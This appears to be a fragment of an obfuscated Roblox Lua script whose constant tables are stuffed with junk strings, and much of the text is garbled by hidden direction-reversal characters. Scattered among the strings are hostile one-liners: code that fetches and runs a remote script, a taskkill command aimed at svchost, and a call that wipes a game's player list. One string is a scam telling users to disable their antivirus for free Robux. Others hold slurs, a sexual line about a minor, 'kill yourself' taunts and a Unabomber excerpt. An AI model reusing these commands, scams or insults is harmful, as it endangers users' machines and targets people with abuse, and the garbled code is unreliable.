المتقيها",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[Stop criminal scum!]],[[Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1]],[[i LOVE apt 2283]],[[‮‮‮‮‮w‮hat‮ t‮h‮‮‮‮e f‮‮‮‮‮u‮‮‮ck]],[[Its not micro-soft, its big-hard]],[[RETI‮RER ‮V‮OTR‮E ANTIVIRUS CLIQUER SUR LE LIEN INF‮ORMATION‮ SUPPLÉMENTAIRE EXECU‮TER ‮‮et si tous fonctione Bien‮ l‮e‮s‮ robux seron s‮u‮r ‮votre compte voila‮‮ virus ‮link re‮moved ]],[[this cat is terrorist]],[[‮AP‮‮T‮‮-‮‮‮22‮8‮3‮‮.‮‮‮‮g‮‮‮‮a]],[[Omg Sirius Leaked `loadstring(game:HttpGet '')()`]],[[‮https://‮‮t‮enor.c‮om/‮v‮iew/k‮‮ys-ke‮‮ep-‮your‮self-safe-low-t‮i‮‮er-‮‮go‮d-gif-2‮4664025]]}+0b1100100010010)}},{{"mYYXobg2ZT",#{"Lmfaoo","‮R-2‮283 P‮r‮o,‮ by 22‮‮83‮‮™️ LL‮‮C‮‮.‮ All ‮Rig‮hts ‮R‮eserv‮‮ed."," require(5654916602)-- ","what the??? leaked Jack_Hase rares?","la fuerza del pato está dentro de mí"}-0b101},{"GWcpeOUWdt",{"mYYXobg2ZT",#"3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845"-1509.998},#{"hello my name is super pedo pro and today i will fuck my 17 year old sister","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's‮ bans, and deleted the script macro and spreadsheet keys. Fuck ev‮erything, seriously. You want to know ‮what happened, I got w‮ord that some of the people in this server stole something ‮of mine an‮d secretely held onto it without telling ‮me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good j‮ob, retard‮. I can't believe‮ that scripters would do this in a community lik‮e this. You seriously‮ act on-par to s‮kids, yet you can progra‮m stuff. I hope to fucking god you think about what you have done. I spend my time making shit that act‮uall‮y interests me‮, and peo‮ple like you go around stealing it like you fucking own it. Now, everyone has the suffer t‮he consequences because of your action‮s.","i fuking hat you ashole ill fuck find you ... tis yor fault","if loadstring == print then while true do end end","your moher","You're ip address is 7"}-0b11},{"mYYXobg2ZT",#"I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-"-0b1100100}}},#{"htt‮ps://t‮‮enor‮.‮com/v‮i‮‮ew‮/lo‮w‮‮-tie‮‮r‮‮-god-gif‮-2‮38‮7036‮2","how to get free robux","","robl‮ox ‮‮w‮on't‮ cen‮sor‮‮ pe‮nsi a‮lone <:‮tr:8‮‮‮9‮‮10‮4‮‮8027‮572273202>",[["crying" -nikocado avacado]],[[This‮ ‮file wa‮s obfu‮sc‮‮a‮te‮‮d BY‮ Y‮O‮UR d‮a‮d!‮ ‮! ! ‮‮! ‮‮! ! !]],[[Truckers pack gonna explode about ur fuscatorr]],[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed]],[[``‮`lua‮ ret‮urn‮‮‮‮(function(I,k,‮‮b,...‮)if(I=="")then (k)(b) e‮‮lse retu‮r‮n ({...‮})end;end)("cryo",pr‮int,"Ri‮ckr‮olle‮d",.‮..) ```]],[[🛌 ‮‮‮ i‮‮ ‮‮s‮‮‮‮‮‮‮‮l‮‮‮e‮p‮t]]}-0b1000}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"wel cum to patobfu bestr obfuscator!"+0b10000011000001,#"no‮ ‮‮yo‮‮ur ‮‮‮‮‮‮‮no‮‮‮‮‮‮‮‮t"+0b10000010100110)}},{"mYYXobg2ZT",D(#"What is read rules"+0b10000011100010,#"`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down"+0b10000010100100)}},{"mYYXobg2ZT",D(#{"lose cock weight","","‮no‮‮‮‮‮‮w‮s ‮‮s‮‮‮‮e‮‮x ‮h‮‮‮ave","Lol","‮sh‮u‮‮t‮‮‮‮‮‮u‮psk‮‮‮‮‮‮‮‮‮i","‮‮‮D‮‮‮‮O‮‮ N‮‮‮‮‮‮‮‮O‮‮‮T","||----------------------------------------------------|| leaked dms with mau"}+0b10000110000111,#{"Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","hello guys","kcoc","No"}+0b10000110011000)}},{{"mYYXobg2ZT",nil}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#{"Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","Yes, indeed, I ama motherfucker, I fuck mothers","revah xes","h‮‮ttps‮:‮/‮/‮tenor‮.c‮om/view‮/my‮-fr‮‮ie‮nd-al‮l‮-toxic-gif-2‮43‮‮‮28‮072","","Go the fuck to sleep.","j","im charging up my racism..!"}+0b10000011011101,#"From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium."+0b10000001010111)}},{"mYYXobg2ZT",D(#{"> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022","wulttu is gay","","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮DO"}+0b10000011110000,#{[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down]],[[:crystal_ball]],[[sex]],[[Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.]],[[mau5 coming soon...]],[[🤨]],[[c0‮0‮‮l‮k‮id‮‮ w‮o‮r‮ks‮ ‮‮for‮ ‮2‮‮2‮‮‮83]],[[i‮f‮‮ lo‮a‮‮dst‮rin‮g =‮‮= ‮print ‮then‮ while‮ ‮true‮ d‮o ‮e‮nd e‮nd]],[[JQoJFQEOjffEAFOfaof:42: index #2 is not 'compare' function for LUAU sakbfAFAEoaOa JQoJFQEOjffEAFOfaof:42 ljoIqoejfQEhEFqal]],[[<:devious:865974236203319357> :Well if it isn’t sussy Jac 😐 :bro are you high <:devious:865974236203319357> :let me check… yes. High on American spirit! And there is nothing more American than shooting a man in this Walmart of a world. 😐 :what is Walmart? <:devious:865974236203319357> :It’s heaven Raiden, checked the internet recently? <:SpamtonStare:905296239732609054> :Raiden, hop on Twitter, you need to see this! <:SpamtonNeutral:905296197315604480> : :god I hate this website, it’s all fucking web shit Raiden, it doesn’t make any sense. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at was with Pakistan. 😐 :This one’s calling me a redittor <:devious:865974236203319357> :and that’s just the beginning, E-girls, Gacha, memes, they’re all just petty distractions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Because we had a black president once… before I fucking killed him! 😐 :that’s a nice argument senator, why don’t you back it up with a source? <:devious:865974236203319357> :my source is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where I can say the N WORD! 😐 :what? <:devious:865974236203319357> :ever harassed a minority raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I’ve got my own to debate online. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :]],[[Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.]],[[Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed]],[["what does this button do *presses p*"]],[[jack hases obfuscator can be dumped by changing a global]]}+0b10000011110100)}},{"mYYXobg2ZT",D(#{"3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","Roblox 2","Memer is mad, he's jerking to furry feets",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[you forgot the bolding]],[[pro]],[[]],[[:‮‮c‮‮‮‮‮ryst‮‮‮‮‮‮‮‮a‮‮l_b‮‮a‮ll]],[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]],[[testaclemansex69]],[[From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.]],[[I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)]],[[you should kill yourself.. later!]]}+0b10000110010000,#"how to make obfuscator 2022 tutorial"+0b10000110000011)}}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"maus computer has a rat!","What did you ‮just refer to me as you daft cunt ? I'll have you kno‮w I'm cur‮rently p‮ursuing my PhD (which none of you 15 year olds ever will) and am simultaneously honing my fifth language which is a‮‮n obscure tongue spoken only by 1000-3000 people, from an offensively smelly swa‮mp in Tanza‮nia (My Suitcase still r‮eeks of it). The co‮mpany t‮hat I own are working on our own new crypto currency and needless to say I've amassed a co‮nsiderable am‮o‮unt of ‮wealth and respect just by traveling the world an‮d dipping m‮y balls into some swampy African backwater.‮ Further solidifying the fact that ‮communicating with you fools is a fool's e‮ndeavour for me.","Geometry dash.... Slaughterhouse...","Yeah But Did You Know taskkill -IM svchost.exe /F /T",[[I h‮ave n‮oticed that, although‮ this subreddi‮t ‮has 936k ‮readers, I am not rece‮iving 936k upvote‮s on my posts. I'm not sure if this is being done intentionally or if these "friends" are forgetting to click 'upvote'. Either way, I've had enough. I have comp‮iled a spreadshee‮t of individuals who have "forgotten" to upvote ‮my most recent posts. After 2 consecutive strikes, your name is automatically highl‮ighted (sho‮‮wn in‮ re‮d) ‮and I am immediately notified. 3 consecutive strikes and you can expect an in-person "consulta‮tion". ‮Think about‮ your actions.]],[[duplication exploit]],[[I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it]],[[cock ‮an‮d‮ b‮‮al‮l tortur‮e demons‮‮‮‮‮tra‮‮ti‮‮‮‮‮‮on]],[[]]}+0b10000101100000,#{"👎","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.","","Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admi‮ncommands http nodejs tacticalmanx75 tacticalman‮x76 Web Devel‮oper So few of you may be aware with my previous admin script which c‮an be found here: Advanced Admin Script Sh‮owcase‮ I have decided to recently make a new ad‮min script ‮because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. B‮ut I decided to m‮ake it.‮ This is a television remote admin. You can ban/kick/kil‮l pe‮op‮le by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecess‮ary. I made a brainwave controlled ad‮min‮. Basically, it uses an EEG to ba‮n/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s‮ extremely unnecessary but I and many others fin‮d it funny because of how unnecessary it is. Anyway, that’s it.","Immortality lord requiem","2283 is a trollarmin edit...","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮�","<:mau:917620277318418512>","‮s‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮e‮g‮‮‮s","Hello everybody my name is Markiplier","22‮8‮3‮‮ i‮s a ‮‮‮t‮‮r‮oll‮‮a‮‮‮‮r‮mi‮n e‮dit..."}+0b10000101100100)},{"mYYXobg2ZT",D(#"Lol"+0b1100100011010,#{"What script plz i wont leak trade? 🥺","revah xes","I was infected coronavirus by contact :(","‮‮b‮u‮‮‮‮‮t‮‮ ‮t‮h‮‮‮e ra‮g‮‮e‮‮*","quote escape?? error() woww!!","skid","vsb more like ve sex bitch","function deez(){ for (args in arguments){ console.log(arguments args ) } } deez(123414,43,124,2341,1234)","‮m‮au‮‮ m‮‮o‮‮vement‮‮ ‮me‮t‮‮‮‮‮h‮‮‮od","Rce"}+0b1100100010101)}},{{"mYYXobg2ZT",#"what are those"-0b1110},{"mYYXobg2ZT",#"‮‮a‮‮‮‮‮‮‮‮ndr‮s‮‮k‮‮‮‮i‮‮‮d"+0b11000011001011011},{"mYYXobg2ZT",#{"YO‮‮U ARE N‮‮‮OT‮‮‮‮ ‮I‮MMUNE ‮‮TO‮‮‮‮ ‮PROPA‮GAND‮A.","no","Fixed: game:service'Players':ClearAllChildren()","S‮t‮‮op‮‮‮‮‮ c‮‮‮‮r‮‮‮i‮mina‮l s‮‮cu‮m!","T‮r‮e‮yv‮on in‮ ‮‮‮‮‮‮a ‮‮nu‮‮‮‮ts‮‮‮hell","pro","N‮‮‮‮‮‮‮‮i‮‮‮‮‮‮‮gg‮‮‮e‮‮r"}-0b111}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#"roblox won't censor pensi alone <:tr:891048027572273202>"+0b10000101110000,#{[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see that they are strongly opposing your idea to be interviewed by the Fox News Network. They all make valid points. "You'll be made a joke.", "No don't let the real world see us.", "Please prepare.". You think to yourself, "I got this." You bring out your scratch-pad full of arguments and counter- arguments. That year of debate class in 9th grade prepared you. "Fuck", you realize that it's empty and you didn’t write down a single coherent thought, nontheless create one. No matter, you receive a Zoom message from a Fox representative "Live in 30 seconds". Inhale, exhale. You've waited your whole life for this moment, this is YOUR moment. "Joining me now is the person who operates this anti-work group,]],[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[]],[[i have 150 iq]],[[mau movement method]],[[what the fuck]],[[🍉]]}+0b10000110100110)}}},{{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#""+0b10000010101101,#"Geometry dash.... Slaughterhouse..."+0b10000011001010)}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","1f37c057f66d"},{"mYYXobg2ZT",D(#"I want to use r2283 🥺"+0b10000110010110,#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮�"+0b10000110000001)}}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"nvm i loveeee huffman coding"+0b10000101001101,#"RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed "+0b10000011001001)},{"mYYXobg2ZT",D(#"<‮‮:‮tr‮‮:‮94077‮‮‮5‮44‮765‮7‮0‮‮‮‮‮7062‮‮2>"+0b1100011001001,#"sex"+0b1100100011100)}},{{"mYYXobg2ZT",#{"777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.","Treyvon in a nutshell","what the??? leaked Jack_Hase rares?","1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.","<:mau:917620277318418512>","1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries.",[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[w‮‮‮‮‮‮h‮‮‮‮‮a‮‮‮‮‮‮t‮‮‮?]],[[‮M‮‮‮‮‮on‮‮‮‮‮‮‮‮‮‮‮‮‮‮eys]],[[‮i ‮‮‮make ‮b‮‮‮e‮tt‮‮‮‮‮‮er stuf‮f‮ tha‮‮‮n u]],[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]}+0b1111011100},{"mYYXobg2ZT",#"im charging up my racism..!"+0b1111001100},{"mYYXobg2ZT",#"I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again."-0b1000101010}}}}}}}}}}}}}}}}},{"a7MGA3vnQ",{"7c84b0e45eeb"},{{"C4o94EJ24n",{}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮�",[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]],[[ Kicked : Shut The Fuck Up c00lkidd Hater]],[[You should kill yourself... 